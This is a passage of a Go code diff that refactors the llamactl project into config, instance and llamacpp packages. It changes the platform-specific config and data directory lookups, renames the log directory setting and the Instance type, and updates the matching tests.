+			return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
+		}
+		return "/usr/local/var/llamactl" // Fallback
+
+	default:
+		// Linux and other Unix-like systems
+		if homeDir, _ := os.UserHomeDir(); homeDir != "" {
+			return filepath.Join(homeDir, ".local", "share", "llamactl")
+		}
+		return "/var/lib/llamactl" // Final fallback
+	}
+}

 // getDefaultConfigLocations returns platform-specific config file locations
 func getDefaultConfigLocations() []string {
 	var locations []string

-	// Current directory (cross-platform)
-	locations = append(locations,
-		"./llamactl.yaml",
-		"./config.yaml",
-	)
-
 	homeDir, _ := os.UserHomeDir()

 	switch runtime.GOOS {
 	case "windows":
-		// Windows: Use APPDATA and ProgramData
+		// Windows: Use APPDATA if available, else user home, fallback to ProgramData
 		if appData := os.Getenv("APPDATA"); appData != "" {
 			locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
-		}
-		if programData := os.Getenv("PROGRAMDATA"); programData != "" {
-			locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
-		}
-		// Fallback to user home
-		if homeDir != "" {
+		} else if homeDir != "" {
 			locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
 		}
+		locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))

 	case "darwin":
-		// macOS: Use proper Application Support directories
+		// macOS: Use Application Support in user home, fallback to /Library/Application Support
 		if homeDir != "" {
-			locations = append(locations,
-				filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
-				filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
-			)
+			locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
 		}
 		locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
-		locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback

 	default:
-		// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
-		configHome := os.Getenv("XDG_CONFIG_HOME")
-		if configHome == "" && homeDir != "" {
-			configHome = filepath.Join(homeDir, ".config")
-		}
-		if configHome != "" {
-			locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
-		}
-
-		// System config: /etc/llamactl/config.yaml
+		// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
+		if homeDir != "" {
+			locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
+		}
 		locations = append(locations, "/etc/llamactl/config.yaml")
-
-		// Additional system locations
-		if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
-			for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
-				if dir != "" {
-					locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
-				}
-			}
-		}
 	}

 	return locations
pkg/config (tests)

@@ -1,16 +1,15 @@
-package llamactl_test
+package config_test

 import (
+	"llamactl/pkg/config"
 	"os"
 	"path/filepath"
 	"testing"
-
-	llamactl "llamactl/pkg"
 )

 func TestLoadConfig_Defaults(t *testing.T) {
 	// Test loading config when no file exists and no env vars set
-	cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
+	cfg, err := config.LoadConfig("nonexistent-file.yaml")
 	if err != nil {
 		t.Fatalf("LoadConfig should not error with defaults: %v", err)
 	}
@@ -22,12 +21,24 @@ func TestLoadConfig_Defaults(t *testing.T) {
 	if cfg.Server.Port != 8080 {
 		t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
 	}
+
+	homedir, err := os.UserHomeDir()
+	if err != nil {
+		t.Fatalf("Failed to get user home directory: %v", err)
+	}
+
+	if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
+		t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
+	}
+	if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
+		t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
+	}
+	if !cfg.Instances.AutoCreateDirs {
+		t.Error("Expected default instances auto-create to be true")
+	}
 	if cfg.Instances.PortRange != [2]int{8000, 9000} {
 		t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
 	}
-	if cfg.Instances.LogDirectory != "/tmp/llamactl" {
-		t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
-	}
 	if cfg.Instances.MaxInstances != -1 {
 		t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
 	}
@@ -56,7 +67,7 @@ server:
   port: 9090
 instances:
   port_range: [7000, 8000]
-  log_directory: "/custom/logs"
+  logs_dir: "/custom/logs"
   max_instances: 5
   llama_executable: "/usr/bin/llama-server"
   default_auto_restart: false
@@ -69,7 +80,7 @@ instances:
 		t.Fatalf("Failed to write test config file: %v", err)
 	}

-	cfg, err := llamactl.LoadConfig(configFile)
+	cfg, err := config.LoadConfig(configFile)
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}
@@ -84,8 +95,8 @@ instances:
 	if cfg.Instances.PortRange != [2]int{7000, 8000} {
 		t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
 	}
-	if cfg.Instances.LogDirectory != "/custom/logs" {
-		t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory)
+	if cfg.Instances.LogsDir != "/custom/logs" {
+		t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
 	}
 	if cfg.Instances.MaxInstances != 5 {
 		t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
@@ -110,7 +121,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 		"LLAMACTL_HOST":                 "0.0.0.0",
 		"LLAMACTL_PORT":                 "3000",
 		"LLAMACTL_INSTANCE_PORT_RANGE":  "5000-6000",
-		"LLAMACTL_LOG_DIR":              "/env/logs",
+		"LLAMACTL_LOGS_DIR":             "/env/logs",
 		"LLAMACTL_MAX_INSTANCES":        "20",
 		"LLAMACTL_LLAMA_EXECUTABLE":     "/env/llama-server",
 		"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
@@ -124,7 +135,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 		defer os.Unsetenv(key)
 	}

-	cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
+	cfg, err := config.LoadConfig("nonexistent-file.yaml")
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}
@@ -139,8 +150,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 	if cfg.Instances.PortRange != [2]int{5000, 6000} {
 		t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
 	}
-	if cfg.Instances.LogDirectory != "/env/logs" {
-		t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory)
+	if cfg.Instances.LogsDir != "/env/logs" {
+		t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
 	}
 	if cfg.Instances.MaxInstances != 20 {
 		t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
@@ -183,7 +194,7 @@ instances:
 	defer os.Unsetenv("LLAMACTL_HOST")
 	defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")

-	cfg, err := llamactl.LoadConfig(configFile)
+	cfg, err := config.LoadConfig(configFile)
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}
@@ -219,7 +230,7 @@ instances:
 		t.Fatalf("Failed to write test config file: %v", err)
 	}

-	_, err = llamactl.LoadConfig(configFile)
+	_, err = config.LoadConfig(configFile)
 	if err == nil {
 		t.Error("Expected LoadConfig to return error for invalid YAML")
 	}
@@ -245,7 +256,7 @@ func TestParsePortRange(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			result := llamactl.ParsePortRange(tt.input)
+			result := config.ParsePortRange(tt.input)
 			if result != tt.expected {
 				t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
 			}
@@ -260,31 +271,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
 	testCases := []struct {
 		envVar   string
 		envValue string
-		checkFn  func(*llamactl.Config) bool
+		checkFn  func(*config.AppConfig) bool
 		desc     string
 	}{
 		{
 			envVar:   "LLAMACTL_PORT",
 			envValue: "invalid-port",
-			checkFn:  func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default
+			checkFn:  func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
 			desc:     "invalid port number should keep default",
 		},
 		{
 			envVar:   "LLAMACTL_MAX_INSTANCES",
 			envValue: "not-a-number",
-			checkFn:  func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
+			checkFn:  func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
 			desc:     "invalid max instances should keep default",
 		},
 		{
 			envVar:   "LLAMACTL_DEFAULT_AUTO_RESTART",
 			envValue: "invalid-bool",
-			checkFn:  func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
+			checkFn:  func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
 			desc:     "invalid boolean should keep default",
 		},
 		{
 			envVar:   "LLAMACTL_INSTANCE_PORT_RANGE",
 			envValue: "invalid-range",
-			checkFn:  func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
+			checkFn:  func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
 			desc:     "invalid port range should keep default",
 		},
 	}
@@ -294,7 +305,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
 			os.Setenv(tc.envVar, tc.envValue)
 			defer os.Unsetenv(tc.envVar)

-			cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
+			cfg, err := config.LoadConfig("nonexistent-file.yaml")
 			if err != nil {
 				t.Fatalf("LoadConfig failed: %v", err)
 			}
@@ -323,7 +334,7 @@ server:
 		t.Fatalf("Failed to write test config file: %v", err)
 	}

-	cfg, err := llamactl.LoadConfig(configFile)
+	cfg, err := config.LoadConfig(configFile)
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}
```diff
@@ -1,10 +1,12 @@
-package llamactl
+package instance
 
 import (
 	"context"
 	"encoding/json"
 	"fmt"
 	"io"
+	"llamactl/pkg/backends/llamacpp"
+	"llamactl/pkg/config"
 	"log"
 	"net/http"
 	"net/http/httputil"
@@ -21,7 +23,7 @@ type CreateInstanceOptions struct {
 	// RestartDelay duration in seconds
 	RestartDelay *int `json:"restart_delay_seconds,omitempty"`
 
-	LlamaServerOptions `json:",inline"`
+	llamacpp.LlamaServerOptions `json:",inline"`
 }
 
 // UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
@@ -53,11 +55,11 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
 	return nil
 }
 
-// Instance represents a running instance of the llama server
-type Instance struct {
+// Process represents a running instance of the llama server
+type Process struct {
 	Name           string                 `json:"name"`
 	options        *CreateInstanceOptions `json:"-"`
-	globalSettings *InstancesConfig
+	globalSettings *config.InstancesConfig
 
 	// Status
 	Running bool `json:"running"`
@@ -121,7 +123,7 @@ func validateAndCopyOptions(name string, options *CreateInstanceOptions) *Create
 }
 
 // applyDefaultOptions applies default values from global settings to any nil options
-func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
+func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
 	if globalSettings == nil {
 		return
 	}
@@ -143,15 +145,15 @@ func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *Instanc
 }
 
 // NewInstance creates a new instance with the given name, log path, and options
-func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
+func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process {
 	// Validate and copy options
 	optionsCopy := validateAndCopyOptions(name, options)
 	// Apply defaults
 	applyDefaultOptions(optionsCopy, globalSettings)
 	// Create the instance logger
-	logger := NewInstanceLogger(name, globalSettings.LogDirectory)
+	logger := NewInstanceLogger(name, globalSettings.LogsDir)
 
-	return &Instance{
+	return &Process{
 		Name:           name,
 		options:        optionsCopy,
 		globalSettings: globalSettings,
@@ -163,13 +165,13 @@ func NewInstance(name string, globalSettings *InstancesConfig, options *CreateIn
 	}
 }
 
-func (i *Instance) GetOptions() *CreateInstanceOptions {
+func (i *Process) GetOptions() *CreateInstanceOptions {
 	i.mu.RLock()
 	defer i.mu.RUnlock()
 	return i.options
 }
 
-func (i *Instance) SetOptions(options *CreateInstanceOptions) {
+func (i *Process) SetOptions(options *CreateInstanceOptions) {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 
@@ -188,7 +190,7 @@ func (i *Instance) SetOptions(options *CreateInstanceOptions) {
 }
 
 // GetProxy returns the reverse proxy for this instance, creating it if needed
-func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
+func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 
@@ -225,7 +227,7 @@ func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
 }
 
 // MarshalJSON implements json.Marshaler for Instance
-func (i *Instance) MarshalJSON() ([]byte, error) {
+func (i *Process) MarshalJSON() ([]byte, error) {
 	// Use read lock since we're only reading data
 	i.mu.RLock()
 	defer i.mu.RUnlock()
@@ -235,22 +237,25 @@ func (i *Instance) MarshalJSON() ([]byte, error) {
 		Name    string                 `json:"name"`
 		Options *CreateInstanceOptions `json:"options,omitempty"`
 		Running bool                   `json:"running"`
+		Created int64                  `json:"created,omitempty"`
 	}{
 		Name:    i.Name,
 		Options: i.options,
 		Running: i.Running,
+		Created: i.Created,
 	}
 
 	return json.Marshal(temp)
 }
 
 // UnmarshalJSON implements json.Unmarshaler for Instance
-func (i *Instance) UnmarshalJSON(data []byte) error {
+func (i *Process) UnmarshalJSON(data []byte) error {
 	// Create a temporary struct for unmarshalling
 	temp := struct {
 		Name    string                 `json:"name"`
 		Options *CreateInstanceOptions `json:"options,omitempty"`
 		Running bool                   `json:"running"`
+		Created int64                  `json:"created,omitempty"`
 	}{}
 
 	if err := json.Unmarshal(data, &temp); err != nil {
@@ -260,6 +265,7 @@ func (i *Instance) UnmarshalJSON(data []byte) error {
 	// Set the fields
 	i.Name = temp.Name
 	i.Running = temp.Running
+	i.Created = temp.Created
 
 	// Handle options with validation but no defaults
 	if temp.Options != nil {
```
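
Note the `json:",inline"` tag on the embedded `llamacpp.LlamaServerOptions`: the standard `encoding/json` package has no `inline` option, so the flattening comes from plain struct embedding plus the custom `UnmarshalJSON` above. A self-contained sketch of the embedding behavior, using stand-in types rather than the repo's:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Stand-in for llamacpp.LlamaServerOptions (assumed field set, for illustration).
type ServerOptions struct {
	Model string `json:"model,omitempty"`
	Port  int    `json:"port,omitempty"`
}

// Embedding flattens the backend options into the parent object,
// mirroring CreateInstanceOptions in the diff above.
type Options struct {
	AutoRestart *bool `json:"auto_restart,omitempty"`
	ServerOptions
}

func main() {
	on := true
	b, _ := json.Marshal(Options{
		AutoRestart:   &on,
		ServerOptions: ServerOptions{Model: "m.gguf", Port: 8080},
	})
	fmt.Println(string(b)) // {"auto_restart":true,"model":"m.gguf","port":8080}
}
```

Marshaling promotes the embedded fields to the top level, which is why an instance's JSON carries `model`, `port`, and the restart fields side by side.
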
```diff
@@ -1,28 +1,30 @@
-package llamactl_test
+package instance_test
 
 import (
 	"encoding/json"
+	"llamactl/pkg/backends/llamacpp"
+	"llamactl/pkg/config"
+	"llamactl/pkg/instance"
+	"llamactl/pkg/testutil"
 	"testing"
-
-	llamactl "llamactl/pkg"
 )
 
 func TestNewInstance(t *testing.T) {
-	globalSettings := &llamactl.InstancesConfig{
-		LogDirectory:        "/tmp/test",
+	globalSettings := &config.InstancesConfig{
+		LogsDir:             "/tmp/test",
 		DefaultAutoRestart:  true,
 		DefaultMaxRestarts:  3,
 		DefaultRestartDelay: 5,
 	}
 
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+	options := &instance.CreateInstanceOptions{
+		LlamaServerOptions: llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
 
-	instance := llamactl.NewInstance("test-instance", globalSettings, options)
+	instance := instance.NewInstance("test-instance", globalSettings, options)
 
 	if instance.Name != "test-instance" {
 		t.Errorf("Expected name 'test-instance', got %q", instance.Name)
@@ -53,8 +55,8 @@ func TestNewInstance(t *testing.T) {
 }
 
 func TestNewInstance_WithRestartOptions(t *testing.T) {
-	globalSettings := &llamactl.InstancesConfig{
-		LogDirectory:        "/tmp/test",
+	globalSettings := &config.InstancesConfig{
+		LogsDir:             "/tmp/test",
 		DefaultAutoRestart:  true,
 		DefaultMaxRestarts:  3,
 		DefaultRestartDelay: 5,
@@ -65,16 +67,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
 	maxRestarts := 10
 	restartDelay := 15
 
-	options := &llamactl.CreateInstanceOptions{
+	options := &instance.CreateInstanceOptions{
 		AutoRestart:  &autoRestart,
 		MaxRestarts:  &maxRestarts,
 		RestartDelay: &restartDelay,
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+		LlamaServerOptions: llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
 
-	instance := llamactl.NewInstance("test-instance", globalSettings, options)
+	instance := instance.NewInstance("test-instance", globalSettings, options)
 	opts := instance.GetOptions()
 
 	// Check that explicit values override defaults
@@ -90,8 +92,8 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
 }
 
 func TestNewInstance_ValidationAndDefaults(t *testing.T) {
-	globalSettings := &llamactl.InstancesConfig{
-		LogDirectory:        "/tmp/test",
+	globalSettings := &config.InstancesConfig{
+		LogsDir:             "/tmp/test",
 		DefaultAutoRestart:  true,
 		DefaultMaxRestarts:  3,
 		DefaultRestartDelay: 5,
@@ -101,15 +103,15 @@ func TestNewInstance_ValidationAndDefaults(t *testing.T) {
 	invalidMaxRestarts := -5
 	invalidRestartDelay := -10
 
-	options := &llamactl.CreateInstanceOptions{
+	options := &instance.CreateInstanceOptions{
 		MaxRestarts:  &invalidMaxRestarts,
 		RestartDelay: &invalidRestartDelay,
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+		LlamaServerOptions: llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
 
-	instance := llamactl.NewInstance("test-instance", globalSettings, options)
+	instance := instance.NewInstance("test-instance", globalSettings, options)
 	opts := instance.GetOptions()
 
 	// Check that negative values were corrected to 0
@@ -122,32 +124,32 @@ func TestNewInstance_ValidationAndDefaults(t *testing.T) {
 }
 
 func TestSetOptions(t *testing.T) {
-	globalSettings := &llamactl.InstancesConfig{
-		LogDirectory:        "/tmp/test",
+	globalSettings := &config.InstancesConfig{
+		LogsDir:             "/tmp/test",
 		DefaultAutoRestart:  true,
 		DefaultMaxRestarts:  3,
 		DefaultRestartDelay: 5,
 	}
 
-	initialOptions := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+	initialOptions := &instance.CreateInstanceOptions{
+		LlamaServerOptions: llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
 
-	instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
+	inst := instance.NewInstance("test-instance", globalSettings, initialOptions)
 
 	// Update options
-	newOptions := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+	newOptions := &instance.CreateInstanceOptions{
+		LlamaServerOptions: llamacpp.LlamaServerOptions{
 			Model: "/path/to/new-model.gguf",
 			Port:  8081,
 		},
 	}
 
-	instance.SetOptions(newOptions)
-	opts := instance.GetOptions()
+	inst.SetOptions(newOptions)
+	opts := inst.GetOptions()
 
 	if opts.Model != "/path/to/new-model.gguf" {
 		t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
@@ -163,20 +165,20 @@ func TestSetOptions(t *testing.T) {
 }
 
 func TestSetOptions_NilOptions(t *testing.T) {
-	globalSettings := &llamactl.InstancesConfig{
-		LogDirectory:        "/tmp/test",
+	globalSettings := &config.InstancesConfig{
+		LogsDir:             "/tmp/test",
 		DefaultAutoRestart:  true,
 		DefaultMaxRestarts:  3,
 		DefaultRestartDelay: 5,
 	}
 
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+	options := &instance.CreateInstanceOptions{
+		LlamaServerOptions: llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
 
-	instance := llamactl.NewInstance("test-instance", globalSettings, options)
+	instance := instance.NewInstance("test-instance", globalSettings, options)
 	originalOptions := instance.GetOptions()
 
 	// Try to set nil options
@@ -190,21 +192,21 @@ func TestSetOptions_NilOptions(t *testing.T) {
 }
 
 func TestGetProxy(t *testing.T) {
-	globalSettings := &llamactl.InstancesConfig{
-		LogDirectory: "/tmp/test",
+	globalSettings := &config.InstancesConfig{
+		LogsDir: "/tmp/test",
 	}
 
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+	options := &instance.CreateInstanceOptions{
+		LlamaServerOptions: llamacpp.LlamaServerOptions{
 			Host: "localhost",
 			Port: 8080,
 		},
 	}
 
-	instance := llamactl.NewInstance("test-instance", globalSettings, options)
+	inst := instance.NewInstance("test-instance", globalSettings, options)
 
 	// Get proxy for the first time
-	proxy1, err := instance.GetProxy()
+	proxy1, err := inst.GetProxy()
 	if err != nil {
 		t.Fatalf("GetProxy failed: %v", err)
 	}
@@ -213,7 +215,7 @@ func TestGetProxy(t *testing.T) {
 	}
 
 	// Get proxy again - should return cached version
-	proxy2, err := instance.GetProxy()
+	proxy2, err := inst.GetProxy()
 	if err != nil {
 		t.Fatalf("GetProxy failed: %v", err)
 	}
@@ -223,21 +225,21 @@ func TestGetProxy(t *testing.T) {
 }
 
 func TestMarshalJSON(t *testing.T) {
-	globalSettings := &llamactl.InstancesConfig{
-		LogDirectory:        "/tmp/test",
+	globalSettings := &config.InstancesConfig{
+		LogsDir:             "/tmp/test",
 		DefaultAutoRestart:  true,
 		DefaultMaxRestarts:  3,
 		DefaultRestartDelay: 5,
 	}
 
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
+	options := &instance.CreateInstanceOptions{
+		LlamaServerOptions: llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
 
-	instance := llamactl.NewInstance("test-instance", globalSettings, options)
+	instance := instance.NewInstance("test-instance", globalSettings, options)
 
 	data, err := json.Marshal(instance)
 	if err != nil {
@@ -284,20 +286,20 @@ func TestUnmarshalJSON(t *testing.T) {
 		}
 	}`
 
-	var instance llamactl.Instance
-	err := json.Unmarshal([]byte(jsonData), &instance)
+	var inst instance.Process
+	err := json.Unmarshal([]byte(jsonData), &inst)
 	if err != nil {
 		t.Fatalf("JSON unmarshal failed: %v", err)
 	}
 
-	if instance.Name != "test-instance" {
-		t.Errorf("Expected name 'test-instance', got %q", instance.Name)
+	if inst.Name != "test-instance" {
+		t.Errorf("Expected name 'test-instance', got %q", inst.Name)
 	}
-	if !instance.Running {
+	if !inst.Running {
 		t.Error("Expected running to be true")
 	}
 
-	opts := instance.GetOptions()
+	opts := inst.GetOptions()
 	if opts == nil {
 		t.Fatal("Expected options to be set")
 	}
@@ -324,13 +326,13 @@ func TestUnmarshalJSON_PartialOptions(t *testing.T) {
 		}
 	}`
 
-	var instance llamactl.Instance
-	err := json.Unmarshal([]byte(jsonData), &instance)
+	var inst instance.Process
+	err := json.Unmarshal([]byte(jsonData), &inst)
 	if err != nil {
 		t.Fatalf("JSON unmarshal failed: %v", err)
 	}
 
-	opts := instance.GetOptions()
+	opts := inst.GetOptions()
 	if opts.Model != "/path/to/model.gguf" {
 		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
 	}
@@ -348,20 +350,20 @@ func TestUnmarshalJSON_NoOptions(t *testing.T) {
 		"running": false
 	}`
 
-	var instance llamactl.Instance
-	err := json.Unmarshal([]byte(jsonData), &instance)
+	var inst instance.Process
+	err := json.Unmarshal([]byte(jsonData), &inst)
 	if err != nil {
 		t.Fatalf("JSON unmarshal failed: %v", err)
 	}
 
-	if instance.Name != "test-instance" {
-		t.Errorf("Expected name 'test-instance', got %q", instance.Name)
+	if inst.Name != "test-instance" {
+		t.Errorf("Expected name 'test-instance', got %q", inst.Name)
 	}
-	if instance.Running {
+	if inst.Running {
 		t.Error("Expected running to be false")
 	}
 
-	opts := instance.GetOptions()
+	opts := inst.GetOptions()
 	if opts != nil {
 		t.Error("Expected options to be nil when not provided in JSON")
 	}
@@ -384,42 +386,42 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
 		},
 		{
 			name:          "valid positive values",
-			maxRestarts:   intPtr(10),
-			restartDelay:  intPtr(30),
+			maxRestarts:   testutil.IntPtr(10),
+			restartDelay:  testutil.IntPtr(30),
 			expectedMax:   10,
 			expectedDelay: 30,
 		},
 		{
 			name:          "zero values",
-			maxRestarts:   intPtr(0),
-			restartDelay:  intPtr(0),
+			maxRestarts:   testutil.IntPtr(0),
+			restartDelay:  testutil.IntPtr(0),
 			expectedMax:   0,
 			expectedDelay: 0,
 		},
 		{
 			name:          "negative values should be corrected",
-			maxRestarts:   intPtr(-5),
-			restartDelay:  intPtr(-10),
+			maxRestarts:   testutil.IntPtr(-5),
+			restartDelay:  testutil.IntPtr(-10),
 			expectedMax:   0,
 			expectedDelay: 0,
 		},
 	}
 
-	globalSettings := &llamactl.InstancesConfig{
-		LogDirectory: "/tmp/test",
+	globalSettings := &config.InstancesConfig{
+		LogsDir: "/tmp/test",
 	}
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			options := &llamactl.CreateInstanceOptions{
+			options := &instance.CreateInstanceOptions{
 				MaxRestarts:  tt.maxRestarts,
 				RestartDelay: tt.restartDelay,
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+				LlamaServerOptions: llamacpp.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 				},
 			}
 
-			instance := llamactl.NewInstance("test", globalSettings, options)
+			instance := instance.NewInstance("test", globalSettings, options)
 			opts := instance.GetOptions()
 
 			if tt.maxRestarts != nil {
```
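
The tests now pull pointer helpers from `llamactl/pkg/testutil` instead of a file-local `intPtr`. The helper's body is not part of this diff; the conventional definition is a one-liner, assumed here:

```go
package testutil

// IntPtr returns a pointer to the given int, handy for the optional
// restart fields in tests. (Assumed definition; not shown in the diff.)
func IntPtr(i int) *int {
	return &i
}
```
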
```diff
@@ -1,4 +1,4 @@
-package llamactl
+package instance
 
 import (
 	"context"
@@ -11,7 +11,7 @@ import (
 )
 
 // Start starts the llama server instance and returns an error if it fails.
-func (i *Instance) Start() error {
+func (i *Process) Start() error {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 
@@ -75,7 +75,7 @@ func (i *Instance) Start() error {
 }
 
 // Stop terminates the subprocess
-func (i *Instance) Stop() error {
+func (i *Process) Stop() error {
 	i.mu.Lock()
 
 	if !i.Running {
@@ -140,7 +140,7 @@ func (i *Instance) Stop() error {
 	return nil
 }
 
-func (i *Instance) monitorProcess() {
+func (i *Process) monitorProcess() {
 	defer func() {
 		i.mu.Lock()
 		if i.monitorDone != nil {
@@ -181,7 +181,7 @@ func (i *Instance) monitorProcess() {
 }
 
 // handleRestart manages the restart process while holding the lock
-func (i *Instance) handleRestart() {
+func (i *Process) handleRestart() {
 	// Validate restart conditions and get safe parameters
 	shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
 	if !shouldRestart {
@@ -223,7 +223,7 @@ func (i *Instance) handleRestart() {
 }
 
 // validateRestartConditions checks if the instance should be restarted and returns the parameters
-func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
+func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
 	if i.options == nil {
 		log.Printf("Instance %s not restarting: options are nil", i.Name)
 		return false, 0, 0
```
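
The renames above leave the lifecycle logic untouched: `monitorProcess` waits on the subprocess and `handleRestart` re-launches it, bounded by `MaxRestarts` with `RestartDelay` seconds between attempts. A rough self-contained sketch of that supervision loop (not the file's exact code, which also juggles locks and a `monitorDone` channel):

```go
package main

import (
	"log"
	"os/exec"
	"time"
)

// supervise runs a fresh command and retries up to maxRestarts times with a
// fixed delay, roughly the policy monitorProcess/handleRestart implement.
func supervise(build func() *exec.Cmd, maxRestarts int, delay time.Duration) {
	restarts := 0
	for {
		cmd := build() // exec.Cmd cannot be reused, so rebuild each attempt
		if err := cmd.Start(); err != nil {
			log.Printf("start failed: %v", err)
			return
		}
		if err := cmd.Wait(); err == nil {
			return // clean exit: nothing to restart
		} else {
			restarts++
			if restarts > maxRestarts {
				log.Printf("giving up after %d restarts", maxRestarts)
				return
			}
			log.Printf("process exited (%v); restarting in %s", err, delay)
			time.Sleep(delay)
		}
	}
}

func main() {
	supervise(func() *exec.Cmd {
		return exec.Command("llama-server", "--help")
	}, 3, 5*time.Second)
}
```
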
```diff
@@ -1,4 +1,4 @@
-package llamactl
+package instance
 
 import (
 	"bufio"
